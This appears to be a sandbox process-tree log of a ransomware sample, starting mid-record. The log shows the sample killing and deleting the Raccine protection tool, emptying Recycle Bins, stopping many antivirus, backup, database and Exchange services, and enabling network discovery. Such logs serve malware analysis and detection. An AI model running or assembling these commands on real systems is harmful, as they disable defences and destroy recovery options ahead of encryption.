C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:5064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:13736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:14404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:5136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:15848

C:\Windows\SysWOW64\net.exe
net view
1⤵
- Discovers systems in the same network
PID:16288

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:16352
- C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
  "2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
  2⤵
  PID:12860
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:13540
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:12908
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:13512
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:14756
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:14912
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:10668
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5472
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:6264
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:7564
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:6992
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:5852
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5712
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5792
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:14868
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:12652
- - C:\Windows\system32\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:11844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:7544
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:7700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:4524
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:15084
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:6924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:15036
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:14436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:14524
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:7520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:7548
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:14852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:14832
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:14000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:7040
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:8252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:6256
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:11812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:5892
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:12812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:12676
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:12864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:10216
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:15076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:6640
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:15028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:8096
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:6288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:15376
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:13028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:15492
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:13056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:15552
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:11132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:14096
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:12264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:15840
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:10656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:6972
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:15520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:6196
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:12988
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:6516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:13000
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:13048
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:15464
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:12992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:15532
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:9596
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:14824
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:15536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:15484
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:6148
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:12980
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:14212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:7792
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:15904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:6012
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:15500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:6248
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:8412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:15100
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:7656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:9848
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:15272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:9864
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:14208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:7496
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:11932
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:16180
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:16196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:7296
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:12208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:11804
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:4676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:12372
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:11872
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:4696
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:8056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:7588
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:6580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:16012
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:8812
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:6996
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:15860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:4532
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:12224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:14728
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:15700
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:15760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:15620
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:14284
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:15508
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:15288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:13364
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:11900
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:14308
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:13308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:16116
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:16136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:8648
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:14276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:7272
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:13348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:8052
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:6432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:11856
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:12668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:14712
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:7248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:15660
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:16224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:16024
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:12340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:15304
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:8128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:16096
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:15928
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:15920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:14720
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:6716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:15672
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:8796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:7480
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:8712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:11848
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:11956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:6660
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:8152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:14240
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:11952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:5948
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:5916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:9616
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:14264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:9572
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:8388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:10856
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:5672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:6888
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:14272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:8836
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:6020
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:5264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:2824
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:9600
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:13384
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:8516
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:7000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:6132
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:9200
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:14952
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:4464
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:15316
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:15276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:8352
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:8724
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:8816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:8552
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:8832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:9548
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:8172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:5896
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:10788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:8824
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:9188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:6696
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6832
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:5868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:7736
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:9928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:6176
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:13672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:7472
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:9104
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:6284
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:5036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:13468
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:13388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:6300
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:13420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:8764
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:7440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:14364
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:9004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:13684
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:13668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:8652
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:13568
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:10088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:8936
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:8556
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:11000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:10568
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:9712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:8032
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:10904
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:11400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:14348
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:13580
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:7208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:11408
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:10964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:7340
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:9196
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:7264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:9496
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:8240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:8188
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:11608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:14036
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:4712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:10956
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:5056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:11220
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:9500
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:8244
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:5600
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:12032
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:9152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:6532
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:8248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:9884
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:12540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:5684
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:11028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:11440
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:5812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:5748
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:9412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:4568
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:8200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:10252
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:4716
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:6384
